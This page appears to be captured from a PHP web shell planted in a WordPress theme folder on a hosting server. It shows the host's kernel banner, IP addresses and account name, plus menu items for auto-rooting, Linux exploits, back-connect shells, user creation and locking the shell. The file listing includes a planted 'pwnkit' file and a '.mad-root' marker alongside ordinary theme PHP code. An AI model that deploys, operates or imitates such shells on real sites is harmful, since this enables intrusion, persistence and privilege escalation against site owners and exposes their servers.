Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
acf
[ DIR ]
drwxr-xr-x
acf-fields
[ DIR ]
drwxr-xr-x
acf-icon-field
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
acf-blocks.php
7.95
KB
-rw-r--r--
acf-enhancements.php
1.51
KB
-rw-r--r--
acf-fields.php
1.37
KB
-rw-r--r--
acf-load.php
919
B
-rw-r--r--
acf-options.php
425
B
-rw-r--r--
alpha-menu.php
2.08
KB
-rw-r--r--
class-alpha-menu-walker.php
4.56
KB
-rw-r--r--
custom-header.php
1.83
KB
-rw-r--r--
customizer.php
1.67
KB
-rw-r--r--
jetpack.php
1.42
KB
-rw-r--r--
product-post-type.php
7.68
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
story-post-type.php
3.96
KB
-rw-r--r--
template-functions.php
907
B
-rw-r--r--
template-tags.php
7.08
KB
-rw-r--r--
widgets.php
805
B
-rw-r--r--
wp-cli-acf-tools.php
10.51
KB
-rw-r--r--
wpcom.php
746
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acf-enhancements.php
<?php /** * Functions to enhance ACF flexible content layouts. * * @package Alpha */ /** * Adds current Flexible Content's Row field as descriptor to the layout * label. An analogue to "Collapsed" field for Repeaters. Useful to * identify an item in a large list of rows. * * @param string $title Title of flexible content section. * @param array $field Field Definition. * @param array $layout Layout data. * @param int $i I think it's row index. * * @return mixed */ function alpha_acf_layout_title( $title, $field, $layout, $i ) { // Use only for certain layouts. /* if ( 'simple_content' == $layout['name'] ) { // Get field content to expand default layout label $name = get_sub_field('title'); if ( $name ) { $title .= ': ' . $name; } } */ return $title; } add_filter( 'acf/fields/flexible_content/layout_title', 'alpha_acf_layout_title', 10, 4 ); /** * Adds Alpha block's category. */ add_filter( 'block_categories', function ( $categories, $post ) { $custom_categories = array( array( 'slug' => 'alpha', 'title' => __( 'Alpha', 'alpha' ), ), ); $categories_slugs = array_reduce( $categories, function ( $res, $cat ) { if ( ! empty( $cat['slug'] ) ) { $res[] = $cat['slug']; } return $res; }, array() ); foreach ( $custom_categories as $custom_category ) { if ( false === array_search( $custom_category['slug'], $categories_slugs, true ) ) { $categories[] = $custom_category; } } return $categories; }, 10, 2 );
Close